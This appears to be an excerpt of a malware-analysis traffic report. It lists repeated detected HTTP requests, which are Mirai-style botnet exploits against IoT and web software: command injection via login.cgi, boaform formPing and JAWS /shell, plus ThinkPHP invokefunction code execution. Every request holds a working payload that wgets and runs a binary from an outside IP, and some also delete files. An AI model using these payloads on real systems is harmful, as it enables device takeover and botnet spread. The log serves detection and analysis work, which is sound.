| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
